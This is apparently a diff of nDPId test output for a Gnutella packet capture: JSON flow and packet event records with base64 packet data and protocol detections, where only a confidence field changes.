-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90005,"flow_last_seen":90005,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90005,"flow_last_seen":90005,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90005,"flow_last_seen":90005,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":90005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90005,"pkt":"UlQAEjUCCAAn5uVZCABFAABt+\/sAAIARkCYKAAIPWHhJ13AJX\/IAWfWM7VYxAm\/Ch\/PFy9OUV6XMR0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90005,"flow_last_seen":90005,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90005,"flow_last_seen":90005,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":90038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90038,"pkt":"CAAn5uVZUlQAEjUCCABFAALzAz0AAEARxl9YeEnXCgACD1\/ycAkC3xJi7VYxAm\/Ch\/PFy9OUV6XMR0QAAMACAAAGR1RLRwAADJe19wd9tDyoR\/wXh6nJoKWkNEIEWHhJ11\/yAQAAAATxtX5bFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqkdUS0cAABK1XVsEZ16ugW6JpsS4xfhpSq81BEjJ0DmW2Q=="} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":798,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":90039,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90039,"pkt":"UlQAEjUCCAAn5uVZCABFAABt7XgAAIAREsUKAAIPUD3d9nAJd3EAWbzbp0UxAokhPuR+ZJu6wwLrOkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":798,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":798,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":799,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":90039,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90039,"pkt":"UlQAEjUCCAAn5uVZCABFAABtEcIAAIARHzsKAAIPYPacfnAJxHkAWRCy7dwxAiOKI2B1HBL1\/IoOJUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":799,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":799,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":800,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":800,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":90039,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90039,"pkt":"UlQAEjUCCAAn5uVZCABFAABtsx4AAIARLMMKAAIPUrX72nAJjhAAWVPSkYYxArzIs2GmVy70sFjiYEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90039,"flow_last_seen":90039,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90039,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":90071,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90071,"pkt":"CAAn5uVZUlQAEjUCCABFAALzAz4AAEAROnpQPd32CgACD3dxcAkC3wb\/p0UxAokhPuR+ZJu6wwLrOkQAAMACAAAGR1RLRwAADWk0EbJTji7xq2N2EERly+h8FzIEUD3d9ndxAQAAAATOg6hoFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90072,"flow_last_seen":90072,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90072,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":90072,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90072,"pkt":"UlQAEjUCCAAn5uVZCABFAABthFwAAIARuZsKAAIPGBrYX3AJNkEAWZh4MEMxAu0STIEN6nLhhZZqvEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":802,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90072,"flow_last_seen":90072,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90072,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":802,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90072,"flow_last_seen":90072,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90072,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90072,"flow_last_seen":90072,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90072,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":90072,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90072,"pkt":"UlQAEjUCCAAn5uVZCABFAABt0UkAAIARidsKAAIPZ+hrZHAJqfQAWVSlBkIxAi75axRUS7XsWs\/C60QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90072,"flow_last_seen":90072,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90072,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90072,"flow_last_seen":90072,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90072,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":804,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90073,"flow_last_seen":90073,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90073,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":90073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90073,"pkt":"UlQAEjUCCAAn5uVZCABFAABtDzkAAIARfk0KAAIPLoBya3AJGbIAWQrBwagxArEYlVcnjAyV6XOvHEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":804,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90073,"flow_last_seen":90073,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90073,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":804,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90073,"flow_last_seen":90073,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90073,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":90132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90132,"pkt":"CAAn5uVZUlQAEjUCCABFAALzA0EAAEARqALBJf+CCgACD\/CwcAkC35hMrf0xAupVi8ylWZxhuwdOwkQAAMACAAAGR1RLRwAAC5wNVaWmIUX476YAPO2IwX6VsyAEwSX\/gvCwAQAAAASWmcaYFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} 